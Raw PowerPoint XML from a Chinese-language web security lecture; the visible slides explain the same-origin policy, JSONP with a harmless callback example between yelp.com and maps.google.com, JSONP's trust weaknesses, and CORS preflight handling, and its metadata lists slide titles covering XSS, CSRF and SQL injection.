                <a:tab pos="1960563" algn="l"/>
                <a:tab pos="2208213" algn="l"/>
                <a:tab pos="2455863" algn="l"/>
                <a:tab pos="2693194" algn="l"/>
                <a:tab pos="2940844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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="731" dirty="0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接受者必须严格验证消息源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417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Relaxation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CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>改进了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，对于预防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>比较有效；但同时给开发者带来很多不便</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>更有弹性的跨源交互策略？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务端集成</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JSONP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CORS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236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1" t="13369" r="13554" b="16091"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4587821" y="2611430"/>
            <a:ext cx="622117" cy="77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服务端集成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2" y="3241818"/>
            <a:ext cx="606951" cy="60695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925981" y="3209142"/>
            <a:ext cx="1007007" cy="912252"/>
            <a:chOff x="8493199" y="3207998"/>
            <a:chExt cx="1239394" cy="11227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493199" y="3909353"/>
              <a:ext cx="1239394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yelp.com</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="13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63264" y="3209142"/>
            <a:ext cx="1758815" cy="912252"/>
            <a:chOff x="8030550" y="3207998"/>
            <a:chExt cx="2164696" cy="112277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030550" y="3909353"/>
              <a:ext cx="2164696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maps.google.com</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="13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23486" y="3131723"/>
            <a:ext cx="2497168" cy="317459"/>
            <a:chOff x="6213632" y="3000914"/>
            <a:chExt cx="3073437" cy="390718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3632" y="3359305"/>
              <a:ext cx="30734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18744" y="3000914"/>
              <a:ext cx="2010807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702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>GET / HTTP/1.1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88539" y="3632658"/>
            <a:ext cx="2532115" cy="383529"/>
            <a:chOff x="6170620" y="3617452"/>
            <a:chExt cx="3116449" cy="472035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="TextBox 22"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6863440" y="3698769"/>
              <a:ext cx="2107480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702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>HTTP/1.1 200 OK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6170620" y="3617452"/>
              <a:ext cx="31164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446713" y="3131723"/>
            <a:ext cx="2497168" cy="317459"/>
            <a:chOff x="6213632" y="3000914"/>
            <a:chExt cx="3073437" cy="39071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213632" y="3359305"/>
              <a:ext cx="30734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18744" y="3000914"/>
              <a:ext cx="2010807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702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>GET / HTTP/1.1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11766" y="3632658"/>
            <a:ext cx="2532115" cy="383529"/>
            <a:chOff x="6170620" y="3617452"/>
            <a:chExt cx="3116449" cy="472035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="TextBox 36"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6863440" y="3698769"/>
              <a:ext cx="2107480" cy="390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63" dirty="0">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>HTTP/1.1 200 OK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6170620" y="3617452"/>
              <a:ext cx="31164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017" y="2688298"/>
            <a:ext cx="752652" cy="7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  <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是另外一个绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XHR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从其它源加载数据是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不允许的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>但是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>JSON-P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入一个跨源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>调用跨源函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The function receives the requested data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JSONP不安全</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141285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  <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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3423" y="5358974"/>
            <a:ext cx="6488177" cy="592223"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="371475">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/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callback(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‘You sent “Test”’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3422" y="1916561"/>
            <a:ext cx="6691605" cy="1766521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// http://www.yelp.com</a:t>
            </a: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625" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr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callback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function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(data) {</a:t>
            </a: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625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alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625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‘Received message: ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625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chemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0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latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>data);</a:t>
            </a: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};</a:t>
            </a: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endParaRPr lang="en-US" sz="1625" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E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var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jsonp_url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http://maps.google.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1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api.js?fn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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1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callback&amp;echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625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=Test'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3423" y="4195945"/>
            <a:ext cx="6287278" cy="515517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71475">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/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625" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>document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.write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'&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1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src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="'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+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 err="1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jsonp_url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7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+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625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'"&gt;&lt;/script&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E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2903" y="3799325"/>
            <a:ext cx="948019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2903" y="5085592"/>
            <a:ext cx="948019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1406" y="5317494"/>
            <a:ext cx="290609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8606" indent="-278606">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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第三方源处理并返回</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0"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406" y="4116110"/>
            <a:ext cx="29060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eriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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注入脚本，访问跨源</a:t>
            </a:r>
            <a:r>
              <a:rPr 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回调函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0"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406" y="2312006"/>
            <a:ext cx="31286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1475" indent="-371475">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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在页面中设置</a:t>
            </a:r>
            <a:r>
              <a:rPr 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JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1950">
                <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr 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P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1950">
                <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>回调函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0">
              <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66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8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/>
      <p:bldP spid="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1" t="13369" r="13554" b="16091"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8736149" y="2124358"/>
            <a:ext cx="622117" cy="778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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>示例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51" y="4067761"/>
            <a:ext cx="606951" cy="606951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139584" y="2722071"/>
            <a:ext cx="876458" cy="912252"/>
            <a:chOff x="8573536" y="3207998"/>
            <a:chExt cx="1078718" cy="11227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73536" y="3909353"/>
              <a:ext cx="1078718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/>
                <a:t>yelp.com</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="13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57862" y="5053202"/>
            <a:ext cx="1758815" cy="912252"/>
            <a:chOff x="8030550" y="3207998"/>
            <a:chExt cx="2164696" cy="112277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1801" y="3207998"/>
              <a:ext cx="702183" cy="70218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030550" y="3909353"/>
              <a:ext cx="2164696" cy="421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25" dirty="0">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>maps.google.com</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="13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863895">
            <a:off x="5668391" y="4460125"/>
            <a:ext cx="2497168" cy="309997"/>
            <a:chOff x="6213632" y="2977770"/>
            <a:chExt cx="3073437" cy="38153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13632" y="3359305"/>
              <a:ext cx="30734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17072" y="2977770"/>
              <a:ext cx="2466553" cy="378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GET /api.js HTTP/1.1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 rot="863895">
            <a:off x="5496543" y="5008673"/>
            <a:ext cx="2532115" cy="370001"/>
            <a:chOff x="6170620" y="3617452"/>
            <a:chExt cx="3116449" cy="455385"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="TextBox 22"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6740998" y="3694035"/>
              <a:ext cx="2018699" cy="37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HTTP/1.1 200 OK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6170620" y="3617452"/>
              <a:ext cx="31164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20390975">
            <a:off x="5532884" y="3317543"/>
            <a:ext cx="2497168" cy="307777"/>
            <a:chOff x="6213632" y="2996179"/>
            <a:chExt cx="3073437" cy="378802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213632" y="3359305"/>
              <a:ext cx="30734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789337" y="2996179"/>
              <a:ext cx="1922026" cy="37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GET / HTTP/1.1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 rot="20390975">
            <a:off x="5644595" y="3833387"/>
            <a:ext cx="2532115" cy="307846"/>
            <a:chOff x="6170620" y="3617452"/>
            <a:chExt cx="3116449" cy="378887"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="TextBox 36"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6749192" y="3617537"/>
              <a:ext cx="2018699" cy="378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mic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>HTTP/1.1 200 OK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6170620" y="3617452"/>
              <a:ext cx="31164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15" y="4532358"/>
            <a:ext cx="752652" cy="752652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangular Callout 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="189618" y="2158334"/>
            <a:ext cx="6161486" cy="988127"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33013"/>
              <a:gd name="adj2" fmla="val 1413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71475"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document.write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('</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="371475"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	&lt;script </a:t>
            </a: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src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='http://maps.google.com/</a:t>
            </a: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api.js?fn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=</a:t>
            </a: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callback&amp;echo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=Test'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="371475"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	&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="371475">
              <a:tabLst>
                <a:tab pos="288925" algn="l"/>
                <a:tab pos="577850" algn="l"/>
                <a:tab pos="866775" algn="l"/>
                <a:tab pos="1155700" algn="l"/>
                <a:tab pos="1444625" algn="l"/>
                <a:tab pos="1733550" algn="l"/>
                <a:tab pos="2022475" algn="l"/>
                <a:tab pos="2311400" algn="l"/>
                <a:tab pos="2600325" algn="l"/>
                <a:tab pos="2889250" algn="l"/>
                <a:tab pos="3178175" algn="l"/>
                <a:tab pos="3467100" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800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  <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>');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3700" y="4423101"/>
            <a:ext cx="3908087" cy="1508297"/>
            <a:chOff x="370896" y="4830315"/>
            <a:chExt cx="4809953" cy="1856365"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="370896" y="4830315"/>
              <a:ext cx="4809953" cy="18563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 dirty="0">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66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942" y="5030325"/>
              <a:ext cx="3673985" cy="390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63">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                  <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>http</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1463" dirty="0">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                  <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>://www.yelp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1463">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                  <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>.com </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1463">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                  <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>网站显示：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1463" dirty="0">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49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13323" y="5596381"/>
              <a:ext cx="3969924" cy="390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63" dirty="0">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>Received message: You sent “Test”</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Multiply 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4852726" y="4847267"/>
              <a:ext cx="304800" cy="304800"/>
            </a:xfrm>
            <a:prstGeom prst="mathMultiply">
              <a:avLst>
                <a:gd name="adj1" fmla="val 948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>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66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724953" y="6128862"/>
              <a:ext cx="1034462" cy="48553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63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70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JSON-P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>的问题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JSONP主要优点是版本兼容性好</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>legacy browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>安全问题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-HK" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过于信赖远程主机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>但主机可能会注入各种内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>如果JSON-P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>服务被攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>可能会造成海量CSRF攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="392503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CORS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>跨源资源共享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浏览器安全机制，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的基础上允许安全的跨源资源共享</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果服务端在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Hearder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中声明，则浏览器允许脚本访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XHR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>返回数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CORS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对简单请求和预（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>preflight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）请求分别对待</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>简单请求会立即发送到服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>预请求在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XHR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>之前会进行请示（策略检查）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37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p1.1-网络安全引言.pptx" id="{762EF3B7-AAD7-4C75-BB8E-47089FF89C1B}" vid="{2740CA84-B4EF-4E9E-8658-17738F99B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4870</TotalTime>
  <Words>6591</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>A4 纸张(210x297 毫米)</PresentationFormat>
  <Paragraphs>1030</Paragraphs>
  <Slides>103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6" baseType="lpstr">
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>SimHei</vt:lpstr>
      <vt:lpstr>Source Code Pro</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Perpetua</vt:lpstr>
      <vt:lpstr>Rockwell</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Equity</vt:lpstr>
      <vt:lpstr>Web安全</vt:lpstr>
      <vt:lpstr>大纲</vt:lpstr>
      <vt:lpstr>1. Web应用架构</vt:lpstr>
      <vt:lpstr>Web架构</vt:lpstr>
      <vt:lpstr>HTML</vt:lpstr>
      <vt:lpstr>HTTP消息</vt:lpstr>
      <vt:lpstr>Cookie</vt:lpstr>
      <vt:lpstr>Session Cookie流程示例</vt:lpstr>
      <vt:lpstr>HTTP数据传递</vt:lpstr>
      <vt:lpstr>Cookie管理</vt:lpstr>
      <vt:lpstr>SOP</vt:lpstr>
      <vt:lpstr>JavaScript浏览器脚本语言</vt:lpstr>
      <vt:lpstr>Document Object Model</vt:lpstr>
      <vt:lpstr>JavaScript和 DOM</vt:lpstr>
      <vt:lpstr>同源策略</vt:lpstr>
      <vt:lpstr>混源页面</vt:lpstr>
      <vt:lpstr>CSS</vt:lpstr>
      <vt:lpstr>Web2.0/XMLHttpRequest (XHR)</vt:lpstr>
      <vt:lpstr>XHR示例</vt:lpstr>
      <vt:lpstr>SOP适用于XHR</vt:lpstr>
      <vt:lpstr>Web应用的安全隐患</vt:lpstr>
      <vt:lpstr>2. 攻击Web客户端</vt:lpstr>
      <vt:lpstr>浏览器的价值和安全挑战</vt:lpstr>
      <vt:lpstr>Web安全模型</vt:lpstr>
      <vt:lpstr>利用浏览器漏洞</vt:lpstr>
      <vt:lpstr>Drive-by Install示例</vt:lpstr>
      <vt:lpstr>容易操作</vt:lpstr>
      <vt:lpstr>假如浏览器没有漏洞…</vt:lpstr>
      <vt:lpstr>Cookie窃取</vt:lpstr>
      <vt:lpstr>跨站脚本攻击（XSS）</vt:lpstr>
      <vt:lpstr>XSS攻击方式</vt:lpstr>
      <vt:lpstr>反射型攻击示例</vt:lpstr>
      <vt:lpstr>如果未做过滤…</vt:lpstr>
      <vt:lpstr>XSS反射攻击</vt:lpstr>
      <vt:lpstr>存储型攻击示例</vt:lpstr>
      <vt:lpstr>好友浏览状态时…</vt:lpstr>
      <vt:lpstr>XSS存储攻击</vt:lpstr>
      <vt:lpstr>基于DOM的XSS攻击</vt:lpstr>
      <vt:lpstr>应对XSS攻击</vt:lpstr>
      <vt:lpstr>HttpOnly Cookies</vt:lpstr>
      <vt:lpstr>客户端XSS过滤</vt:lpstr>
      <vt:lpstr>输入合法性检测</vt:lpstr>
      <vt:lpstr>输出净化</vt:lpstr>
      <vt:lpstr>数据净化挑战</vt:lpstr>
      <vt:lpstr>响应分片问题</vt:lpstr>
      <vt:lpstr>注入页面</vt:lpstr>
      <vt:lpstr>响应分片示例</vt:lpstr>
      <vt:lpstr>注入cookie</vt:lpstr>
      <vt:lpstr>跨站请求伪造（CSRF）</vt:lpstr>
      <vt:lpstr>问题站点</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>CSRF攻击</vt:lpstr>
      <vt:lpstr>基于CSRF收集信息</vt:lpstr>
      <vt:lpstr>预防CSRF攻击</vt:lpstr>
      <vt:lpstr>HTTP Referer Header</vt:lpstr>
      <vt:lpstr>Referer副作用：泄露隐私</vt:lpstr>
      <vt:lpstr>CSRF Tokens</vt:lpstr>
      <vt:lpstr>CSRF总结</vt:lpstr>
      <vt:lpstr>点击劫持</vt:lpstr>
      <vt:lpstr>预防Clickjacking</vt:lpstr>
      <vt:lpstr>3. 攻击Web服务</vt:lpstr>
      <vt:lpstr>Web架构</vt:lpstr>
      <vt:lpstr>SQL简介</vt:lpstr>
      <vt:lpstr>SQL注入：登录</vt:lpstr>
      <vt:lpstr>SQL注入示例</vt:lpstr>
      <vt:lpstr>SQL盲注</vt:lpstr>
      <vt:lpstr>NoSQL</vt:lpstr>
